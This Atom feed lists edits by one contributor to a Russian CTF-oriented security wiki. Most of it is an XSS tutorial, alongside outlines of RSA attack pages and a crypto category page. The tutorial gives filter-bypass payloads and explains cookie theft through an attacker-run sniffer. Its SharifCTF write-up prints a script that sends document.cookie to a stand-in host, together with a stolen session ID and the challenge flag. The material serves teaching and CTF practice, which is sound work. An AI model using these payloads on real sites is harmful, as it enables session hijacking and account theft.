<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="ru">
		<id>http://itsecwiki.org/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=ComAT0Zz</id>
		<title>InformationSecurity WIKI - Вклад участника [ru]</title>
		<link rel="self" type="application/atom+xml" href="http://itsecwiki.org/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=ComAT0Zz"/>
		<link rel="alternate" type="text/html" href="http://itsecwiki.org/index.php/%D0%A1%D0%BB%D1%83%D0%B6%D0%B5%D0%B1%D0%BD%D0%B0%D1%8F:%D0%92%D0%BA%D0%BB%D0%B0%D0%B4/ComAT0Zz"/>
		<updated>2026-05-18T20:40:09Z</updated>
		<subtitle>Вклад участника</subtitle>
		<generator>MediaWiki 1.27.7</generator>

	<entry>
		<id>http://itsecwiki.org/index.php?title=%D0%90%D1%82%D0%B0%D0%BA%D0%B8_%D0%BD%D0%B0_RSA&amp;diff=239</id>
		<title>Атаки на RSA</title>
		<link rel="alternate" type="text/html" href="http://itsecwiki.org/index.php?title=%D0%90%D1%82%D0%B0%D0%BA%D0%B8_%D0%BD%D0%B0_RSA&amp;diff=239"/>
				<updated>2016-03-03T05:52:11Z</updated>
		
		<summary type="html">&lt;p&gt;ComAT0Zz: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
== Общие понятия ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Список атак ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Малая публичная экспонента e ===&lt;br /&gt;
&lt;br /&gt;
=== Атака перебором возможных открытых текстов ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Использование общих модулей ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Циклическая атака (безключевое чтение RSA) ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Маленький приватный ключ ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Атака Винера (Wiener Attack) ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Атака Боне и Дюрфи (Boneh, Durfee Attack) ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Атака Бляйхенбахера (Bleichebacher Attack) ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Метод DFA (Differential Fault Analysis) ===&lt;/div&gt;</summary>
		<author><name>ComAT0Zz</name></author>	</entry>

	<entry>
		<id>http://itsecwiki.org/index.php?title=%D0%90%D1%82%D0%B0%D0%BA%D0%B8_%D0%BD%D0%B0_RSA&amp;diff=238</id>
		<title>Атаки на RSA</title>
		<link rel="alternate" type="text/html" href="http://itsecwiki.org/index.php?title=%D0%90%D1%82%D0%B0%D0%BA%D0%B8_%D0%BD%D0%B0_RSA&amp;diff=238"/>
				<updated>2016-03-03T05:43:56Z</updated>
		
		<summary type="html">&lt;p&gt;ComAT0Zz: /* Малая экспонента e */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
== Малая публичная экспонента e ==&lt;br /&gt;
&lt;br /&gt;
== Атака перебором возможных открытых текстов ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Использование общих модулей ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Циклическая атака (безключевое чтение RSA) ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Маленький приватный ключ ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Атака Винера (Wiener Attack) ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Атака Боне и Дюрфи (Boneh, Durfee Attack) ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Атака Бляйхенбахера (Bleichebacher Attack) ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Метод DFA (Differential Fault Analysis) ==&lt;/div&gt;</summary>
		<author><name>ComAT0Zz</name></author>	</entry>

	<entry>
		<id>http://itsecwiki.org/index.php?title=%D0%90%D1%82%D0%B0%D0%BA%D0%B8_%D0%BD%D0%B0_RSA&amp;diff=237</id>
		<title>Атаки на RSA</title>
		<link rel="alternate" type="text/html" href="http://itsecwiki.org/index.php?title=%D0%90%D1%82%D0%B0%D0%BA%D0%B8_%D0%BD%D0%B0_RSA&amp;diff=237"/>
				<updated>2016-03-03T05:35:44Z</updated>
		
		<summary type="html">&lt;p&gt;ComAT0Zz: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
== Малая экспонента e ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Атака перебором возможных открытых текстов ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Использование общих модулей ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Циклическая атака (безключевое чтение RSA) ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Маленький приватный ключ ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Атака Винера (Wiener Attack) ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Атака Боне и Дюрфи (Boneh, Durfee Attack) ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Атака Бляйхенбахера (Bleichebacher Attack) ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Метод DFA (Differential Fault Analysis) ==&lt;/div&gt;</summary>
		<author><name>ComAT0Zz</name></author>	</entry>

	<entry>
		<id>http://itsecwiki.org/index.php?title=%D0%90%D1%82%D0%B0%D0%BA%D0%B8_%D0%BD%D0%B0_RSA&amp;diff=236</id>
		<title>Атаки на RSA</title>
		<link rel="alternate" type="text/html" href="http://itsecwiki.org/index.php?title=%D0%90%D1%82%D0%B0%D0%BA%D0%B8_%D0%BD%D0%B0_RSA&amp;diff=236"/>
				<updated>2016-03-03T05:35:04Z</updated>
		
		<summary type="html">&lt;p&gt;ComAT0Zz: Новая страница: «Малая экспонента e  Атака перебором возможных открытых текстов  Использование общих мод…»&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Малая экспонента e&lt;br /&gt;
&lt;br /&gt;
Атака перебором возможных открытых текстов&lt;br /&gt;
&lt;br /&gt;
Использование общих модулей&lt;br /&gt;
&lt;br /&gt;
Циклическая атака (безключевое чтение RSA)&lt;br /&gt;
&lt;br /&gt;
Маленький приватный ключ&lt;br /&gt;
&lt;br /&gt;
Атака Винера (Wiener Attack)&lt;br /&gt;
&lt;br /&gt;
Атака Боне и Дюрфи (Boneh, Durfee Attack)&lt;br /&gt;
&lt;br /&gt;
Атака Бляйхенбахера (Bleichebacher Attack)&lt;br /&gt;
&lt;br /&gt;
Метод DFA (Differential Fault Analysis)&lt;/div&gt;</summary>
		<author><name>ComAT0Zz</name></author>	</entry>

	<entry>
		<id>http://itsecwiki.org/index.php?title=Xss&amp;diff=195</id>
		<title>Xss</title>
		<link rel="alternate" type="text/html" href="http://itsecwiki.org/index.php?title=Xss&amp;diff=195"/>
				<updated>2016-02-10T14:08:36Z</updated>
		
		<summary type="html">&lt;p&gt;ComAT0Zz: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Cross Site Scripting — тип атаки на веб-системы, заключающийся во внедрении в выдаваемую веб-системой страницу вредоносного кода (который будет выполнен на компьютере пользователя при открытии им этой страницы) и взаимодействии этого кода с веб-сервером злоумышленника.&lt;br /&gt;
&lt;br /&gt;
ВАЖНО!! Статья пока что не включает в себя DOM XSS!&lt;br /&gt;
&lt;br /&gt;
== Нахождение XSS ==&lt;br /&gt;
&lt;br /&gt;
Разделим нахождение на несколько пунктов&lt;br /&gt;
&lt;br /&gt;
=== Поиск параметров ===&lt;br /&gt;
&lt;br /&gt;
Для нахождения параметров можно либо воспользоваться программкой, встроенной в BurpSuite, либо найти все параметры вручную сниффером.&lt;br /&gt;
&lt;br /&gt;
Чтобы включить spider'а, нужно правой кнопкой по директории -&amp;gt; Spider this host&lt;br /&gt;
&lt;br /&gt;
[[File:burpspider.png|Включение spider'а в BurpSuite]]&lt;br /&gt;
&lt;br /&gt;
'''В параметры входят не только POST/GET и другие типы запросов!''' Вот пример, где xss появляется из-за вывода url (чаще всего на 404 страницах) в bWAPP:&lt;br /&gt;
&lt;br /&gt;
[[File:URLXSS.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Подстановка ===&lt;br /&gt;
&lt;br /&gt;
Для проверки параметров первоначально нужно удостовериться, что код выводится на странице.&lt;br /&gt;
&lt;br /&gt;
Что делаем: в каждый параметр вставляем уникальную строку, которой нет на странице и делаем поиск по исходному коду.&lt;br /&gt;
&lt;br /&gt;
Пример:&lt;br /&gt;
&lt;br /&gt;
     Ссылка на эту страницу:&lt;br /&gt;
      /index.php?title=Xss&lt;br /&gt;
&lt;br /&gt;
Видим, что есть параметр title (но не забывайте смотреть и пост параметры)&lt;br /&gt;
&lt;br /&gt;
Тогда подставим в него строку 'testtesttest'.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[File:ss_find1.png|Поиск параметров, выводящих вводимые переменные на экран]]&lt;br /&gt;
&lt;br /&gt;
Видим, что наш текст вывелся - записываем его куда-нибудь и повторяем это действие с другими параметрами.&lt;br /&gt;
&lt;br /&gt;
В итоге к этому моменту у нас на руках список параметров, которые нужно продолжать проверять дальше.&lt;br /&gt;
&lt;br /&gt;
=== Изучение фильтров ===&lt;br /&gt;
&lt;br /&gt;
Теперь начинается самое интересное!&lt;br /&gt;
&lt;br /&gt;
Подставляем следующую строку в параметр:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
     '&amp;amp;quot;:;&amp;amp;lt;&amp;amp;gt;/\[]&amp;amp;lt;script&amp;amp;gt;&amp;amp;lt;h1&amp;amp;gt;&lt;br /&gt;
&lt;br /&gt;
И далее идет разделение на результат:&lt;br /&gt;
&lt;br /&gt;
==== Отсутствие фильтров ====&lt;br /&gt;
&lt;br /&gt;
Если у вас текст так и остался неизменным, то мои поздравления - ВЫ нашли XSS!&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[file:xssuccess.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Убрался &amp;amp;lt;script&amp;amp;gt; ====&lt;br /&gt;
&lt;br /&gt;
Если у вас вдруг исчез ТОЛЬКО &amp;amp;lt;script&amp;amp;gt;, то вероятнее всего идет поиск по опасным тегам - но и это в современном мире обходится.&lt;br /&gt;
&lt;br /&gt;
Теперь посмотрим внимательнее - если у вас из строки ...a'&amp;amp;lt;script&amp;amp;gt;'b... получилась строка ...ab... то делаем следующее:&lt;br /&gt;
&lt;br /&gt;
      test&amp;amp;lt;scr&amp;amp;lt;script&amp;amp;gt;ipt&amp;amp;gt;test&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
В итоге у нас должна получиться строка вида:&lt;br /&gt;
&lt;br /&gt;
      test&amp;amp;lt;script&amp;amp;gt;test&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ну и опять же SUCCESS!&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===== Убрались И &amp;amp;lt;script&amp;amp;gt; И &amp;amp;lt;h1&amp;amp;gt; =====&lt;br /&gt;
&lt;br /&gt;
В этом случае чаще всего идет прогон по всем известным миру тегам - и тут обойти можно только при некоторых обстоятельствах (одно из них вы можете посмотреть в пунке 'убрались знаки &amp;lt;&amp;gt;')&lt;br /&gt;
&lt;br /&gt;
==== Исчезли знаки '&amp;amp;lt;' и '&amp;amp;gt;' ====&lt;br /&gt;
&lt;br /&gt;
Тут уже интереснее тк зависит от окружения.&lt;br /&gt;
===== В &amp;amp;lt;a href='test'&amp;amp;gt; и других параметрах в ' или &amp;quot; кавычках =====&lt;br /&gt;
&lt;br /&gt;
Тут к нам на помощь придут такие параметры, как onload или onmouseover.&lt;br /&gt;
&lt;br /&gt;
Что будет, если отослать test' onload='alert()' a='  ?&lt;br /&gt;
&lt;br /&gt;
А вот что:&lt;br /&gt;
&lt;br /&gt;
     &amp;amp;lt;a href='test' onload='alert()' a=''&amp;amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
В итоге у нас запустится окошко алерта!&lt;br /&gt;
&lt;br /&gt;
===== В тегах &amp;amp;lt;script&amp;amp;gt;...&amp;amp;lt;/script&amp;amp;gt; =====&lt;br /&gt;
&lt;br /&gt;
Тк рассчитываем, что у нас фильруются только знаки '&amp;amp;lt;' и '&amp;amp;gt;', то почти любой код в яве можно НАписать без них - а тем более ДОписать.&lt;br /&gt;
&lt;br /&gt;
Возьмем в пример следующий код:&lt;br /&gt;
&lt;br /&gt;
     &amp;amp;lt;script&amp;amp;gt;&lt;br /&gt;
             var a = 'text';&lt;br /&gt;
     &amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
&lt;br /&gt;
А теперь смотрим, что будет при подстановке test1'; alert(); var b = 'test2    :&lt;br /&gt;
&lt;br /&gt;
     &amp;amp;lt;script&amp;amp;gt;&lt;br /&gt;
             var a = 'text';&lt;br /&gt;
             alert();&lt;br /&gt;
             var b = 'test2';&lt;br /&gt;
     &amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
&lt;br /&gt;
В итоге наш код заработает, и при достижении второй строки скрипта появится окошко алерта!&lt;br /&gt;
&lt;br /&gt;
P.S.ВАЖНО!!! Если вы ошибетесь в синтаксисе js, то ваш код скорее всего не заработает. Поэтому советую проверять все в консоли.&lt;br /&gt;
&lt;br /&gt;
==== Большинство символов преобразовались в &amp;amp;g t ; &amp;amp;l t ; и др ====&lt;br /&gt;
&lt;br /&gt;
В этом случае вся переменная обрабатывается PHP (дополните функции из других яп) функцией под названием htmlspecialchars.&lt;br /&gt;
&lt;br /&gt;
Про нее подробно написано тут: http://php.net/manual/ru/function.htmlspecialchars.php&lt;br /&gt;
&lt;br /&gt;
А вот и пример ее использования (взято с google.com):&lt;br /&gt;
&lt;br /&gt;
[[File:htmlspecialchars.png]]&lt;br /&gt;
&lt;br /&gt;
В этом случае защиту, увы, пока никак не обойти... пока...&lt;br /&gt;
&lt;br /&gt;
== Эксплуатация XSS ==&lt;br /&gt;
&lt;br /&gt;
Ну нашли мы XSS - и что это нам дало? В этом пункте я приведу некоторые примеры (скорее всего их больше) эксплуатации XSS.&lt;br /&gt;
&lt;br /&gt;
=== Кража cookies ===&lt;br /&gt;
&lt;br /&gt;
Ну самое известное - это конечно кража чужих куки, с последующей заменой свои куки на куки жертвы и захода в аккаунт.&lt;br /&gt;
&lt;br /&gt;
Что требуется для этого&lt;br /&gt;
&lt;br /&gt;
*Сниффер&lt;br /&gt;
*Контакт с жертвой&lt;br /&gt;
*XSS&lt;br /&gt;
&lt;br /&gt;
Начну с описания сниффера&lt;br /&gt;
&lt;br /&gt;
==== Сниффер ====&lt;br /&gt;
&lt;br /&gt;
Обьясню доступным языком. Cниффер (в данном случае) - скрипт, записыващий все обращения к нему (в том числе и полый url).&lt;br /&gt;
&lt;br /&gt;
Например у нас есть на каком то сервере файл site.ru/sniffer.php ,&lt;br /&gt;
&lt;br /&gt;
(пример кода позже)&lt;br /&gt;
&lt;br /&gt;
который записывает все обращения к нему. &lt;br /&gt;
&lt;br /&gt;
Вот я зашел на site.ru/sniffer.php?testtesttest - и у него в логах записалось &lt;br /&gt;
&lt;br /&gt;
    1) ip&lt;br /&gt;
    2) useragent&lt;br /&gt;
    3) testtesttest&lt;br /&gt;
&lt;br /&gt;
, где testtesttest - чаще всего куки приписанные.&lt;br /&gt;
&lt;br /&gt;
А теперь обьясняю почему на этот список стоит обратить внимание - многие задания с этим связаны на тасковых ctf.&lt;br /&gt;
&lt;br /&gt;
Распространенные задания:&lt;br /&gt;
&lt;br /&gt;
     Есть чатобот (таких часто в вк встретишь) - который читает все сообщения. &lt;br /&gt;
     Читает он их как обыкновенный человек - открывает в браузере,поддерживающем javascript.  &lt;br /&gt;
     Нужно у него получить какой-то из пунктов (ip, useragent и(или) куки(чаще всего!))&lt;br /&gt;
&lt;br /&gt;
Как они проходятся:&lt;br /&gt;
    &lt;br /&gt;
    Обходим защиту xss (при ее наличии).&lt;br /&gt;
    Посылаем бота на наш сниффер.&lt;br /&gt;
    Получаем все нужные данные со сниффера.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Все это время мы разбирали хранимые XSS (когда xss сохраняется на сервере). Вот вам пример задания на НЕ хранимую (когда xss привязывается к url):&lt;br /&gt;
&lt;br /&gt;
     Есть скрипт, открывающий все ссылки,которые ему передали.&lt;br /&gt;
     Читает он их как обыкновенный человек - открывает в браузере,поддерживающем javascript.  &lt;br /&gt;
     Нужно у него получить какой-то из пунктов (ip, useragent и(или) куки(чаще всего!))&lt;br /&gt;
&lt;br /&gt;
Решение такое - же.&lt;br /&gt;
&lt;br /&gt;
     &lt;br /&gt;
&lt;br /&gt;
(нужны примеры с реальных ctf)&lt;br /&gt;
&lt;br /&gt;
=== CSRF+XSS ===&lt;br /&gt;
&lt;br /&gt;
Опять же вкратце - выполняет за пользователя действия, которые пользователь врят ли бы выполнил в здравом уме (например сделать администратором кого-то).&lt;br /&gt;
&lt;br /&gt;
Тут кроме XSS, еще и требуется CSRF уязвимость - про нее почитать можете у нас на вики.&lt;br /&gt;
&lt;br /&gt;
Опять пример:&lt;br /&gt;
&lt;br /&gt;
     Есть чатобот (таких часто в вк встретишь) - который читает все сообщения. &lt;br /&gt;
     Читает он их как обыкновенный человек - открывает в браузере,поддерживающем javascript.  &lt;br /&gt;
     Нужно у него получить флаг, который он может отправить только при post запросе при ,например, нажатии на какую-либо кнопку.&lt;br /&gt;
&lt;br /&gt;
Решение:&lt;br /&gt;
&lt;br /&gt;
     Раскручиваем XSS&lt;br /&gt;
     Пишем XSS скрипт, отсылающий нужный нам запрос от лица жертвы.&lt;br /&gt;
     Получаем флаг и ништяки=)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Частные случаи обхода фильтров==&lt;br /&gt;
&lt;br /&gt;
Вынес в отдельную часть тк xss по большей части от обхода фильтрации и зависит(она и является обходом фильтров:)&lt;br /&gt;
(примеры собрал с нескольких сайтов - в разделе статей их напишу)&lt;br /&gt;
    &lt;br /&gt;
     alert(String.fromCharCode(120,97,107,110,101,116,46,114,117))&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
     alert(unescape(/%78%61%6b%6e%65%74%2e%72%75/.source))&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
     &amp;amp;lt;IMG SRC=&amp;amp;!#106;&amp;amp;!#97;&amp;amp;!#118;&amp;amp;!#97;&amp;amp;!#115;&amp;amp;!#99;&amp;amp;!#114;&amp;amp;!#105;&amp;amp;!#112;&amp;amp;!#116;&amp;amp;!#58;&amp;amp;!#97;&amp;amp;!#108;&amp;amp;!#101;&amp;amp;!#114;&amp;amp;!#116;&amp;amp;!#40;&amp;amp;!#39;&amp;amp;!#120;&amp;amp;!#97;&amp;amp;!#107;&amp;amp;!#110;&amp;amp;!#101;&amp;amp;!#116;&amp;amp;!#46;&amp;amp;!#114;&amp;amp;!#117;&amp;amp;!#39;&amp;amp;!#41;&amp;amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
     &amp;amp;lt;IMG SRC=&amp;amp;!#0000106a&amp;amp;!#0000118&amp;amp;!#0000097&amp;amp;!#0000115&amp;amp;!#0000099&amp;amp;!#0000114&amp;amp;!#0000105&amp;amp;!#0000112&amp;amp;!#0000116&amp;amp;!#0000058&amp;amp;!#0000097&amp;amp;!#0000108&amp;amp;!#0000101&amp;amp;!#0000114&amp;amp;!#0000116&amp;amp;!#0000040&amp;amp;!#0000039&amp;amp;!#0000120&amp;amp;!#000097&amp;amp;!#0000107&amp;amp;!#0000110&amp;amp;!#0000101&amp;amp;!#0000116&amp;amp;!#0000046&amp;amp;!#0000114&amp;amp;!#0000117&amp;amp;!#0000039&amp;amp;!#0000041&amp;amp;gt;&lt;br /&gt;
&lt;br /&gt;
(знаки ! удалить)&lt;br /&gt;
&lt;br /&gt;
     &amp;amp;lt;IMG SRC=&amp;quot;Ja	va	sc	ri	pt	:	al	er	t(	'me	ssa	ge'	)&amp;quot;&amp;amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
     &amp;amp;lt;META HTTP-EQUIV=&amp;quot;refresh&amp;quot; CONTENT=&amp;quot;0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgneGFrbmV0LnJ1Jyk8L3NjcmlwdD4=&amp;quot;&amp;amp;gt;&lt;br /&gt;
&lt;br /&gt;
Обход путем двойного urlencode (bWAPP):&lt;br /&gt;
&lt;br /&gt;
     %3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%29%3c%2f%73%63%72%69%70%74%3e&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;quot;В качестве обфускации вектора, можно использовать ActionScript через Flash, путём использования переменных и присваивания им значений, которые являются частями xss-кода.&amp;quot;&lt;br /&gt;
&lt;br /&gt;
     a=&amp;quot;get&amp;quot;;&lt;br /&gt;
     b=&amp;quot;URL(\&amp;quot;&amp;quot;;&lt;br /&gt;
     c=&amp;quot;javascript:&amp;quot;;&lt;br /&gt;
     d=&amp;quot;alert('message');\&amp;quot;)&amp;quot;;&lt;br /&gt;
     eval(a+b+c+d);&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;quot;Использование UTF-7.Заключается данный способ в изменении кодировки символов xss-вектора на UTF-7. Это может сработать в тех случаях, когда в странице не указывается кодировка, и атакующий может заставить страницу испольвоть UTF-7, тем самым, обойти фильтрацию, изменив некоторые из символов UTF-8 на UTF-7.&amp;quot;&lt;br /&gt;
&lt;br /&gt;
     &amp;amp;lt;HEAD&amp;amp;gt;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;CONTENT-TYPE&amp;quot; CONTENT=&amp;quot;text/html; charset=UTF-7&amp;quot;&amp;amp;gt;&amp;amp;lt;/HEAD&amp;amp;gt;+ADw-SCRIPT+AD4-alert('message');+ADw-/SCRIPT+AD4-&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
В статье http://dsec.ru/ipm-research-center/article/bypassing_the_filtering_of_the_uploaded_images_in_a_number_of_web_applications_for_the_implementatio/&lt;br /&gt;
&lt;br /&gt;
рассказывается обход фильтрации с помощью картинки.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
http://raz0r.name/news/xss-filters-bypass-on-blackhat/&lt;br /&gt;
&lt;br /&gt;
А вот уже с блекхата:&lt;br /&gt;
&lt;br /&gt;
     (É=[Å=[],µ=!Å+Å][µ[È=-~-~++Å]+({}+Å) [Ç=!!Å+µ,ª=Ç[Å]+Ç[+!Å],Å]+ª])() [µ[Å]+µ[Å+Å]+Ç[È]+ª](Å)&lt;br /&gt;
     ($=[$=[]][(__=!$+$)[_=-~-~-~$]+({}+$)[_/_]+($$=($_=!''&lt;br /&gt;
     +$)[_/_]+$_[+$])])()[__[_/_]+__[_+~$]+$_[_]+$$](_/_)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
И на последок - http://www.smeegesec.com/2012/06/collection-of-cross-site-scripting-xss.html&lt;br /&gt;
&lt;br /&gt;
Тут вы можете найти список xss пейлоадов для тестирования.&lt;br /&gt;
&lt;br /&gt;
== Множество примеров ==&lt;br /&gt;
&lt;br /&gt;
=== SHarifCTF 2016 - WEB photoblog ===&lt;br /&gt;
&lt;br /&gt;
====Описание====&lt;br /&gt;
&lt;br /&gt;
url - http://ctf.sharif.edu:33455/chal/PhotoBlog/d57ad4d0f9afd1f1/&lt;br /&gt;
A friend of mine have stolen my cat's picture on his blog. I want to login as admin user on his blog. Do you have any idea?&lt;br /&gt;
&lt;br /&gt;
====Решение====&lt;br /&gt;
&lt;br /&gt;
     1. C dirs3arch мы можем найти авторизацию админа: admin.php которая редиректит нас на login.php. Все это только потому что у нас нет правильной сессии.&lt;br /&gt;
     2. XSS в поле под комментарии,&lt;br /&gt;
     3. &amp;lt;script&amp;gt;document.write('&amp;lt;img src=&amp;quot;http://mysite.com/cookies.php?cookie=' + document.cookie + '&amp;quot; /&amp;gt;')&amp;lt;/script&amp;gt;&lt;br /&gt;
     4. Украденные куки админа: PHPSESSID=515386866780b5f132fc96c02b3ddb82.&lt;br /&gt;
     5. Используя их, мы можем открыть страницу админки и получить флаг: c03dfe9d79b2dd4a0c8352949bde9ab9 &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Статьи и прочее ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Статьи ===&lt;br /&gt;
&lt;br /&gt;
https://github.com/codedokode/pasta/blob/master/security/xss.md&lt;br /&gt;
&lt;br /&gt;
https://ru.wikipedia.org/wiki/%D0%9C%D0%B5%D0%B6%D1%81%D0%B0%D0%B9%D1%82%D0%BE%D0%B2%D1%8B%D0%B9_%D1%81%D0%BA%D1%80%D0%B8%D0%BF%D1%82%D0%B8%D0%BD%D0%B3&lt;br /&gt;
&lt;br /&gt;
https://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29&lt;br /&gt;
&lt;br /&gt;
http://forum.antichat.ru/threads/20140/&lt;br /&gt;
&lt;br /&gt;
http://forum.antichat.ru/threads/224582/&lt;br /&gt;
&lt;br /&gt;
http://dsec.ru/ipm-research-center/article/bypassing_the_filtering_of_the_uploaded_images_in_a_number_of_web_applications_for_the_implementatio/&lt;br /&gt;
&lt;br /&gt;
===Райтапы===&lt;br /&gt;
NorthSec 2015 - XSS Challenge Writeups &lt;br /&gt;
&lt;br /&gt;
http://holyvier.blogspot.ru/2015/05/northsec-xss-challenge-writeups.html&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
CSAW CTF 2014 - WEB 300&lt;br /&gt;
&lt;br /&gt;
http://wiremask.eu/csaw-ctf-2014-web-300-hashes-writeup/&lt;br /&gt;
&lt;br /&gt;
===Тренировки===&lt;br /&gt;
&lt;br /&gt;
https://xss-game.appspot.com/&lt;br /&gt;
&lt;br /&gt;
http://www.root-me.org/en/Challenges/Web-Client/Javascript-Stored-XSS-1&lt;br /&gt;
&lt;br /&gt;
http://www.root-me.org/en/Challenges/Web-Client/Javascript-Stored-XSS-2&lt;/div&gt;</summary>
		<author><name>ComAT0Zz</name></author>	</entry>

	<entry>
		<id>http://itsecwiki.org/index.php?title=%D0%9A%D0%B0%D1%82%D0%B5%D0%B3%D0%BE%D1%80%D0%B8%D1%8F:Crypto&amp;diff=194</id>
		<title>Категория:Crypto</title>
		<link rel="alternate" type="text/html" href="http://itsecwiki.org/index.php?title=%D0%9A%D0%B0%D1%82%D0%B5%D0%B3%D0%BE%D1%80%D0%B8%D1%8F:Crypto&amp;diff=194"/>
				<updated>2016-02-08T13:52:02Z</updated>
		
		<summary type="html">&lt;p&gt;ComAT0Zz: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Список статей по криптографии для решения CTF соревнований.&lt;br /&gt;
&lt;br /&gt;
[[:%D0%92%D0%B7%D0%BB%D0%BE%D0%BC_Rail_fence_cipher|Взлом Rail Fence cipher]]&lt;br /&gt;
&lt;br /&gt;
[[:%D0%92%D0%B7%D0%BB%D0%BE%D0%BC_Ceasar_cipher|Взлом Ceasar cipher]]&lt;br /&gt;
&lt;br /&gt;
[[:%D0%92%D0%B7%D0%BB%D0%BE%D0%BC_Vigenere_cipher|Взлом Vigenere cipher]]&lt;br /&gt;
&lt;br /&gt;
[[:Частотный_анализ|Частотный анализ]]&lt;br /&gt;
&lt;br /&gt;
[[:CBC_padding_oracle|CBC padding oracle]]&lt;br /&gt;
&lt;br /&gt;
[[:%D0%92%D0%B7%D0%BB%D0%BE%D0%BC_MT19937_stream_cipher|Взлом MT19937 stream cipher]]&lt;br /&gt;
&lt;br /&gt;
== Внешние ссылки ==&lt;br /&gt;
&lt;br /&gt;
[https://www.picoctf.com/crypto_mats/index.html Introduction to Cryptography]&lt;/div&gt;</summary>
		<author><name>ComAT0Zz</name></author>	</entry>

	<entry>
		<id>http://itsecwiki.org/index.php?title=%D0%A7%D0%B0%D1%81%D1%82%D0%BE%D1%82%D0%BD%D1%8B%D0%B9_%D0%B0%D0%BD%D0%B0%D0%BB%D0%B8%D0%B7&amp;diff=193</id>
		<title>Частотный анализ</title>
		<link rel="alternate" type="text/html" href="http://itsecwiki.org/index.php?title=%D0%A7%D0%B0%D1%81%D1%82%D0%BE%D1%82%D0%BD%D1%8B%D0%B9_%D0%B0%D0%BD%D0%B0%D0%BB%D0%B8%D0%B7&amp;diff=193"/>
				<updated>2016-02-08T13:50:58Z</updated>
		
		<summary type="html">&lt;p&gt;ComAT0Zz: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Считается, что в каждом раговорном языке для встречаемых в тексте букв есть определенная величина частоты. Также частота на комбинации двух, трех и четырех букв. &lt;br /&gt;
&lt;br /&gt;
Таблица соответствия частот букв для некоторых европейских языков&lt;br /&gt;
&lt;br /&gt;
[[Файл:Table.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
